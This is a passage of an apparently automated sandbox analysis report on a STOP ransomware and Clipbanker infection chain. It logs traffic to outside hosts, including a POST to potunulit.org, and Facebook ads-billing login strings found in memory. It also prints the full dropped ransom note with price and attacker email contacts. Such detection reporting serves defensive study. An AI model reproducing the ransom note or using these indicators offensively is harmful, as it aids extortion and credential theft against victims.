                Source: aafg31.exe, 00000015.00000003.559161122.000001E2901D6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: ondsLoggerBlue"],{__rc:["TimeSpentImmediateActiveSecondsLoggerBlue","Aa1O99cfU-pkeTcPF2d6GbOH_9MHXdLzY8Tt-WmS59ZEsPOu2rt8QFcHQo4_cKauMK4uUqF8A-JTQHd4Z63JMM10ss4"]},-1],["cr:1187159",["BlueCompatBroker"],{__rc:["BlueCompatBroker","Aa1O99cfU-pkeTcPF2d6GbOH_9MHXdLzY8Tt-WmS59ZEsPOu2rt8QFcHQo4_cKauMK4uUqF8A-JTQHd4Z63JMM10ss4"]},-1],["cr:5800",[],{__rc:[null,"Aa2GmtElFOD_1k20G_WlsokZJaTpo56Fr3u1gCYGbAtgdDbYlT_CIgiavE0hts7cqrHeFP97Eno3VEpaEKBst4TUuO8"]},-1],["ImmediateActiveSecondsConfig",[],{sampling_rate:0},423]],require:[["BDClientSignalCollectionTrigger","startSignalCollection",[],[{sc:"{\"t\":1659080345,\"c\":[[30000,838801],[30001,838801],[30002,838801],[30003,838801],[30004,838801],[30005,838801],[30006,573585],[30007,838801],[30008,838801],[30012,838801],[30013,838801],[30015,806033],[30018,806033],[30021,540823],[30022,540817],[30040,806033],[30093,806033],[30094,806033],[30095,806033],[30101,541591],[30102,541591],[30103,541591],[30104,541591],[30106,806039],[30107,806039],[38000,541427],[38001,806643]]}",fds:60,fda:60,i:60,sbs:1,dbs:100,bbs:100,hbi:60,rt:262144,hbcbc:2,hbvbc:0,hbbi:30,sid:-1,hbv:"6041888917634349990"}]],["NavigationMetrics","setPage",[],[{page:"XWebLoginController",page_type:"normal",page_uri:"https://www.facebook.com/login.php?next=https%3A%2F%2Fadsmanager.facebook.com%2Fads%2Fmanager%2Faccount_settings%2Faccount_billing%2F",serverLID:"7238151240056680427"}]],["FalcoLoggerTransports","attach",[],[]],["ClickRefLogger"],["DetectBrokenProxyCache","run",[],[mHa$sR equals www.facebook.com (Facebook)
                Source: aafg31.exe, 00000015.00000003.616875927.000001E2922D3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: pipe_token":"AXjZ6wGXtfhJEKvvL80","gk_instrument_object_url":true,"stack_trace_limit":30,"timesliceBufferSize":5000,"show_invariant_decoder":false,"compat_iframe_token":"AQ6iSpgOr5fQTsmStDY","isCQuick":false});</script><script nonce="sjAjnDCw">(function(a){function b(b){if(!window.openDatabase)return;b.I_AM_INCOGNITO_AND_I_REALLY_NEED_WEBSQL=function(a,b,c,d){return window.openDatabase(a,b,c,d)};window.openDatabase=function(){throw new Error()}}b(a)})(this);</script><style nonce="sjAjnDCw"></style><script nonce="sjAjnDCw">__DEV__=0;</script><noscript><meta http-equiv="refresh" content="0; URL=/login.php?next=https%3A%2F%2Fadsmanager.facebook.com%2Fads%2Fmanager%2Faccount_settings%2Faccount_billing%2F&amp;_fb_noscript=1" /></noscript><link rel="manifest" id="MANIFEST_LINK" href="/data/manifest/" crossorigin="use-credentials" /><title id="pageTitle">Log into Facebook</title><meta name="google" content="notranslate" /><meta name="description" content="Log into Facebook to start sharing and connecting with your friends, family, and people you know." /><meta property="og:site_name" content="Facebook" /><meta property="og:url" content="https://www.facebook.com/login.php?next=https%3A%2F%2Fadsmanager.facebook.com%2Fads%2Fmanager%2Faccount_settings%2Faccount_billing%2F" /><meta property="og:locale" content="en_US" /><link rel="canonical" href="https://www.facebook.com/login/web/" /><link rel="icon" href="https://static.xx.fbcdn.net/rsrc.php/yv/r/B8BxsscfVBr.ico" /><link type="text/css" rel="stylesheet" href="https://static.xx.fbcdn.net/rsrc.php/v3/yP/l/0,cross/6MB_F4yiWj8.css?_nc_x=Ij3Wp8lg5Kz" data-bootloader-hash="HLTHBFO" /> equals www.facebook.com (Facebook)
                Source: aafg31.exe, 00000015.00000003.594664148.000001E292290000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: poster: *.oculuscdn.com;media-src *.cdninstagram.com blob: *.fbcdn.net *.fbsbx.com www.facebook.com *.facebook.com data:;frame-src *.facebook.com *.fbsbx.com fbsbx.com data: *.fbcdn.net;worker-src blob: *.facebook.com data:;block-all-mixed-content;upgrade-insecure-requests;report-uri https://www.facebook.com/csp/reporting/?m=c&minimize=0; equals www.facebook.com (Facebook)
                Source: aafg31.exe, 00000015.00000003.569252099.000001E2901D5000.00000004.00000020.00020000.00000000.sdmp, aafg31.exe, 00000015.00000002.618169870.000001E2901D2000.00000004.00000001.00020000.00000000.sdmp, aafg31.exe, 00000015.00000003.539122814.000001E2901D6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: report-to: {"max_age":259200,"endpoints":[{"url":"https:\/\/www.facebook.com\/ajax\/browser_error_reports\/?device_level=unknown"}]} equals www.facebook.com (Facebook)
                Source: aafg31.exe, 00000015.00000003.616407141.000001E2922EB000.00000004.00000020.00020000.00000000.sdmp, aafg31.exe, 00000015.00000003.559711394.000001E2901A6000.00000004.00000020.00020000.00000000.sdmp, aafg31.exe, 00000015.00000003.593963921.000001E2922EC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: www.facebook.com equals www.facebook.com (Facebook)
                Source: aafg31.exe, 00000015.00000002.618169870.000001E290161000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: www.facebook.com' equals www.facebook.com (Facebook)
                Source: aafg31.exe, 00000015.00000003.559711394.000001E2901A6000.00000004.00000020.00020000.00000000.sdmp, aafg31.exe, 00000015.00000003.569051255.000001E2901A6000.00000004.00000020.00020000.00000000.sdmp, aafg31.exe, 00000015.00000003.566066441.000001E2901A6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: www.facebook.com.\ equals www.facebook.com (Facebook)
                Source: aafg31.exe, 00000015.00000002.618169870.000001E29016F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: www.facebook.com2F equals www.facebook.com (Facebook)
                Source: aafg31.exe, 00000015.00000002.618169870.000001E2901D2000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: www.facebook.com3:X equals www.facebook.com (Facebook)
                Source: aafg31.exe, 00000015.00000003.558924559.000001E292285000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: www.facebook.com5 equals www.facebook.com (Facebook)
                Source: aafg31.exe, 00000015.00000002.642437211.000001E292246000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: www.facebook.com:443/login.php?next=https%3A%2F%2Fadsmanager.facebook.com%2Fads%2Fmanager%2Faccount_settings%2Faccount_billing%2F equals www.facebook.com (Facebook)
                Source: aafg31.exe, 00000015.00000003.559711394.000001E2901A6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: www.facebook.com?\ equals www.facebook.com (Facebook)
                Source: aafg31.exe, 00000015.00000002.618169870.000001E2901A6000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: www.facebook.com@\ equals www.facebook.com (Facebook)
                Source: aafg31.exe, 00000015.00000002.618169870.000001E29016F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: www.facebook.comF equals www.facebook.com (Facebook)
                Source: aafg31.exe, 00000015.00000002.618169870.000001E2900FB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: www.facebook.comHTEP equals www.facebook.com (Facebook)
                Source: aafg31.exe, 00000015.00000002.618169870.000001E2900FB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: www.facebook.comhtep equals www.facebook.com (Facebook)
                Source: aafg31.exe, 00000015.00000003.559161122.000001E2901D6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: www.facebook.comok.com equals www.facebook.com (Facebook)
                Source: aafg31.exe, 00000015.00000003.616407141.000001E2922BE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: zy(["Env"],b):(window.Env=window.Env||{},b(window.Env))}envFlush({"useTrustedTypes":false,"isTrustedTypesReportOnly":false,"ajaxpipe_token":"AXjZ6wGXtfhJEKvvL80","gk_instrument_object_url":true,"stack_trace_limit":30,"timesliceBufferSize":5000,"show_invariant_decoder":false,"compat_iframe_token":"AQ6iSpgOr5fQTsmStDY","isCQuick":false});</script><script nonce="sjAjnDCw">(function(a){function b(b){if(!window.openDatabase)return;b.I_AM_INCOGNITO_AND_I_REALLY_NEED_WEBSQL=function(a,b,c,d){return window.openDatabase(a,b,c,d)};window.openDatabase=function(){throw new Error()}}b(a)})(this);</script><style nonce="sjAjnDCw"></style><script nonce="sjAjnDCw">__DEV__=0;</script><noscript><meta http-equiv="refresh" content="0; URL=/login.php?next=https%3A%2F%2Fadsmanager.facebook.com%2Fads%2Fmanager%2Faccount_settings%2Faccount_billing%2F&amp;_fb_noscript=1" /></noscript><link rel="manifest" id="MANIFEST_LINK" href="/data/manifest/" crossorigin="use-credentials" /><title id="pageTitle">Log into Facebook</title><meta name="google" content="notranslate" /><meta name="description" content="Log into Facebook to start sharing and connecting with your friends, family, and people you know." /><meta property="og:site_name" content="Facebook" /><meta property="og:url" content="https://www.facebook.com/login.php?next=https%3A%2F%2Fadsmanager.facebook.com%2Fads%2Fmanager%2Faccount_settings%2Faccount_billing%2F" /><meta property="og:locale" content="en_US" /><link rel="canonical" href="https://www.facebook.com/login/web/" /><link rel="icon" href="https://static.xx.fbcdn.net/rsrc.php/yv/r/B8BxsscfVBr.ico" /><link type="text/css" rel="stylesheet" href="https://static.xx.fbcdn.net/rsrc.php/v3/yP/l/0,cross/6MB_F4yiWj8.css?_nc_x=Ij3Wp8lg5Kz" data-bootloader-hash="HLTHBFO" /> equals www.facebook.com (Facebook)
                Source: aafg31.exe, 00000015.00000003.593189980.000001E2922BE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: zy(["Env"],b):(window.Env=window.Env||{},b(window.Env))}envFlush({"useTrustedTypes":false,"isTrustedTypesReportOnly":false,"ajaxpipe_token":"AXjZ6wGXtfhJEKvvXGo","gk_instrument_object_url":true,"stack_trace_limit":30,"timesliceBufferSize":5000,"show_invariant_decoder":false,"compat_iframe_token":"AQ6iSpgOr5fQTsmS9OI","isCQuick":false});</script><script nonce="AWGLzne9">(function(a){function b(b){if(!window.openDatabase)return;b.I_AM_INCOGNITO_AND_I_REALLY_NEED_WEBSQL=function(a,b,c,d){return window.openDatabase(a,b,c,d)};window.openDatabase=function(){throw new Error()}}b(a)})(this);</script><style nonce="AWGLzne9"></style><script nonce="AWGLzne9">__DEV__=0;</script><noscript><meta http-equiv="refresh" content="0; URL=/login.php?next=https%3A%2F%2Fadsmanager.facebook.com%2Fads%2Fmanager%2Faccount_settings%2Faccount_billing%2F&amp;_fb_noscript=1" /></noscript><link rel="manifest" id="MANIFEST_LINK" href="/data/manifest/" crossorigin="use-credentials" /><title id="pageTitle">Log into Facebook</title><meta name="google" content="notranslate" /><meta name="description" content="Log into Facebook to start sharing and connecting with your friends, family, and people you know." /><meta property="og:site_name" content="Facebook" /><meta property="og:url" content="https://www.facebook.com/login.php?next=https%3A%2F%2Fadsmanager.facebook.com%2Fads%2Fmanager%2Faccount_settings%2Faccount_billing%2F" /><meta property="og:locale" content="en_US" /><link rel="canonical" href="https://www.facebook.com/login/web/" /><link rel="icon" href="https://static.xx.fbcdn.net/rsrc.php/yv/r/B8BxsscfVBr.ico" /><link type="text/css" rel="stylesheet" href="https://static.xx.fbcdn.net/rsrc.php/v3/yP/l/0,cross/6MB_F4yiWj8.css?_nc_x=Ij3Wp8lg5Kz" data-bootloader-hash="HLTHBFO" /> equals www.facebook.com (Facebook)
                Source: aafg31.exe, 00000015.00000003.617256768.000001E292290000.00000004.00000020.00020000.00000000.sdmp, aafg31.exe, 00000015.00000002.643560384.000001E292292000.00000004.00000020.00020000.00000000.sdmp, aafg31.exe, 00000015.00000003.558924559.000001E292285000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: {"max_age":259200,"endpoints":[{"url":"https:\/\/www.facebook.com\/ajax\/browser_error_reports\/?device_level=unknown"}]} equals www.facebook.com (Facebook)
                Source: unknownHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://xlqkimn.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 196Host: potunulit.org
                Source: unknownHTTPS traffic detected: 217.174.148.28:443 -> 192.168.2.3:49701 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 162.0.217.254:443 -> 192.168.2.3:49702 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 162.0.217.254:443 -> 192.168.2.3:49707 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 162.0.217.254:443 -> 192.168.2.3:49708 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 217.174.148.28:443 -> 192.168.2.3:49723 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 162.0.217.254:443 -> 192.168.2.3:49724 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 149.154.167.99:443 -> 192.168.2.3:49728 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 162.0.217.254:443 -> 192.168.2.3:49729 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 162.0.217.254:443 -> 192.168.2.3:49732 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 162.0.217.254:443 -> 192.168.2.3:49733 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 162.0.217.254:443 -> 192.168.2.3:49735 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 162.0.217.254:443 -> 192.168.2.3:49747 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 162.0.217.254:443 -> 192.168.2.3:49749 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 162.0.217.254:443 -> 192.168.2.3:49753 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 217.174.148.28:443 -> 192.168.2.3:49752 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 162.0.217.254:443 -> 192.168.2.3:49755 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 162.0.217.254:443 -> 192.168.2.3:49762 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 162.0.217.254:443 -> 192.168.2.3:49765 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 162.0.217.254:443 -> 192.168.2.3:49767 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 162.0.217.254:443 -> 192.168.2.3:49774 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 162.0.217.254:443 -> 192.168.2.3:49802 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 217.174.148.28:443 -> 192.168.2.3:49805 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 162.0.217.254:443 -> 192.168.2.3:49806 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 162.0.217.254:443 -> 192.168.2.3:49808 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 162.0.217.254:443 -> 192.168.2.3:49811 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 157.240.17.17:443 -> 192.168.2.3:49827 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 157.240.9.35:443 -> 192.168.2.3:49837 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 162.0.217.254:443 -> 192.168.2.3:49844 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 162.0.217.254:443 -> 192.168.2.3:49853 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 149.154.167.99:443 -> 192.168.2.3:49883 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 157.240.17.17:443 -> 192.168.2.3:49892 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 157.240.9.35:443 -> 192.168.2.3:49894 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 149.154.167.99:443 -> 192.168.2.3:49903 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 149.154.167.99:443 -> 192.168.2.3:49924 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 80.66.203.53:443 -> 192.168.2.3:49934 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 149.154.167.99:443 -> 192.168.2.3:49947 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 157.240.17.17:443 -> 192.168.2.3:49970 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 149.154.167.99:443 -> 192.168.2.3:49971 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 157.240.9.35:443 -> 192.168.2.3:49975 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 149.154.167.99:443 -> 192.168.2.3:50000 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 157.240.17.17:443 -> 192.168.2.3:50021 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 157.240.234.35:443 -> 192.168.2.3:50022 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 149.154.167.99:443 -> 192.168.2.3:50024 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 149.154.167.99:443 -> 192.168.2.3:50031 version: TLS 1.2

                Key, Mouse, Clipboard, Microphone and Screen Capturing

                barindex
                Source: Yara matchFile source: 00000026.00000002.505614178.00000000007D0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.380148014.0000000002421000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000026.00000002.508616217.0000000002231000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.380129580.0000000002400000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000002.445573902.0000000000700000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000002.446406704.00000000022D1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: 01860199.exe, 00000000.00000002.379986606.000000000084A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

                Spam, unwanted Advertisements and Ransom Demands

                barindex
                Source: C:\_readme.txtDropped file: ATTENTION!Don't worry, you can return all your files!All your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.The only method of recovering files is to purchase decrypt tool and unique key for you.This software will decrypt all your encrypted files.What guarantees you have?You can send one of your encrypted file from your PC and we decrypt it for free.But we can decrypt only 1 file for free. File must not contain valuable information.You can get and look video overview decrypt tool:https://we.tl/t-tnzomMj6HUPrice of private key and decrypt software is $980.Discount 50% available if you contact us first 72 hours, that's price for you is $490.Please note that you'll never restore your data without payment.Check your e-mail "Spam" or "Junk" folder if you don't get answer more than 6 hours.To get this software you need write on our e-mail:support@freshmail.topReserve e-mail address to contact us:datarestorehelp@airmail.ccYour personal ID:0717JOsieaz8OAYewNgELvwQrvCQFNi4j455hRwuI26KpqTgc
                Source: Yara matchFile source: Process Memory Space: D804.exe PID: 6088, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: D804.exe PID: 4528, type: MEMORYSTR
                Source: Yara matchFile source: 29.2.A170.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 5.2.D804.exe.26915a0.1.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 16.2.D804.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 26.2.B46F.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 34.2.913F.exe.24115a0.1.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 29.2.A170.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 27.2.A170.exe.24c15a0.1.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 25.2.B46F.exe.24d15a0.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 37.2.913F.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 18.2.D804.exe.24d15a0.1.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 13.2.D804.exe.25315a0.1.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 31.2.D804.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 31.2.D804.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 25.2.B46F.exe.24d15a0.1.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 5.2.D804.exe.26915a0.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 18.2.D804.exe.24d15a0.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 27.2.A170.exe.24c15a0.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 34.2.913F.exe.24115a0.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 37.2.913F.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 13.2.D804.exe.25315a0.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 28.2.D804.exe.24615a0.1.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 19.2.D804.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 26.2.B46F.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 28.2.D804.exe.24615a0.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 16.2.D804.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 19.2.D804.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 6.2.D804.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 6.2.D804.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0000001F.00000002.486782772.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000025.00000002.508274482.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000010.00000002.619429561.0000000000891000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000012.00000002.451684545.00000000024D0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000001B.00000002.493740298.00000000024C0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000005.00000002.442867169.0000000002690000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000010.00000002.617846506.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000001C.00000002.491035809.0000000002460000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000001D.00000002.489556428.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000022.00000002.483526399.0000000002410000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000019.00000002.474131384.00000000024D0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000006.00000002.449975040.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000D.00000002.450667818.0000000002530000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000013.00000002.617779609.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000001A.00000002.488867120.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: D804.exe PID: 2560, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: D804.exe PID: 772, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: D804.exe PID: 1340, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: D804.exe PID: 6088, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: D804.exe PID: 128, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: D804.exe PID: 4528, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: B46F.exe PID: 4928, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: B46F.exe PID: 2576, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: A170.exe PID: 1868, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: D804.exe PID: 1264, type: MEMORYSTR
                Source: C:\Users\user\AppData\Local\Temp\D804.exeFile moved: C:\Users\user\Desktop\HMPPSXQPQV.png
                Source: C:\Users\user\AppData\Local\Temp\D804.exeFile deleted: C:\Users\user\Desktop\HMPPSXQPQV.png
                Source: C:\Users\user\AppData\Local\Temp\D804.exeFile moved: C:\Users\user\Desktop\NWCXBPIUYI.jpg
                Source: C:\Users\user\AppData\Local\Temp\D804.exeFile deleted: C:\Users\user\Desktop\NWCXBPIUYI.jpg
                Source: C:\Users\user\AppData\Local\Temp\D804.exeFile moved: C:\Users\user\Desktop\CZQKSDDMWR.png
                Source: C:\Users\user\AppData\Local\Temp\D804.exeFile dropped: C:\_readme.txt -> decrypt tool and unique key for you.this software will decrypt all your encrypted files.what guarantees you have?you can send one of your encrypted file from your pc and we decrypt it for free.but we can decrypt only 1 file for free. file must not contain valuable information.you can get and look video overview decrypt tool:https://we.tl/t-tnzommj6huprice of private key and decrypt software is $980.discount 50% available if you contact us first 72 hours, that's price for you is $490.please note that you'll never restore your data without payment.check your e-mail "spam" or "junk" folder if you don't get answer more than 6 hours.to get this software you need write on our e-mail:support@freshmail.topreserve e-mail address to contact us:datarestorehelp@airmail.ccyour personal id:0717josieaz8oayewngelvwqrvcqfni4j455hrwui26kpqtgc
                Source: C:\Users\user\AppData\Local\Temp\D804.exeFile dropped: C:\Users\user\_readme.txt -> decrypt tool and unique key for you.this software will decrypt all your encrypted files.what guarantees you have?you can send one of your encrypted file from your pc and we decrypt it for free.but we can decrypt only 1 file for free. file must not contain valuable information.you can get and look video overview decrypt tool:https://we.tl/t-tnzommj6huprice of private key and decrypt software is $980.discount 50% available if you contact us first 72 hours, that's price for you is $490.please note that you'll never restore your data without payment.check your e-mail "spam" or "junk" folder if you don't get answer more than 6 hours.to get this software you need write on our e-mail:support@freshmail.topreserve e-mail address to contact us:datarestorehelp@airmail.ccyour personal id:0717josieaz8oayewngelvwqrvcqfni4j455hrwui26kpqtgc

                System Summary

                barindex
                Source: 30.0.build3.exe.1000000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Clipbanker_f9f9e79d Author: unknown
                Source: 30.0.build3.exe.1000000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Clipbanker_787b130b Author: unknown
                Source: 29.2.A170.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects STOP ransomware Author: ditekSHen
                Source: 29.2.A170.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
                Source: 5.2.D804.exe.26915a0.1.unpack, type: UNPACKEDPEMatched rule: Detects STOP ransomware Author: ditekSHen
                Source: 5.2.D804.exe.26915a0.1.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
                Source: 16.2.D804.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects STOP ransomware Author: ditekSHen
                Source: 16.2.D804.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
                Source: 26.2.B46F.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects STOP ransomware Author: ditekSHen
                Source: 26.2.B46F.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
                Source: 34.2.913F.exe.24115a0.1.unpack, type: UNPACKEDPEMatched rule: Detects STOP ransomware Author: ditekSHen
                Source: 34.2.913F.exe.24115a0.1.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
                Source: 29.2.A170.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects STOP ransomware Author: ditekSHen
                Source: 29.2.A170.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
                Source: 27.2.A170.exe.24c15a0.1.unpack, type: UNPACKEDPEMatched rule: Detects STOP ransomware Author: ditekSHen
                Source: 27.2.A170.exe.24c15a0.1.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
                Source: 25.2.B46F.exe.24d15a0.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects STOP ransomware Author: ditekSHen
                Source: 25.2.B46F.exe.24d15a0.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
                Source: 40.2.mstsca.exe.9b0000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Clipbanker_f9f9e79d Author: unknown
                Source: 40.2.mstsca.exe.9b0000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Clipbanker_787b130b Author: unknown
                Source: 37.2.913F.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects STOP ransomware Author: ditekSHen
                Source: 37.2.913F.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
                Source: 18.2.D804.exe.24d15a0.1.unpack, type: UNPACKEDPEMatched rule: Detects STOP ransomware Author: ditekSHen
                Source: 18.2.D804.exe.24d15a0.1.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
                Source: 13.2.D804.exe.25315a0.1.unpack, type: UNPACKEDPEMatched rule: Detects STOP ransomware Author: ditekSHen
                Source: 13.2.D804.exe.25315a0.1.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
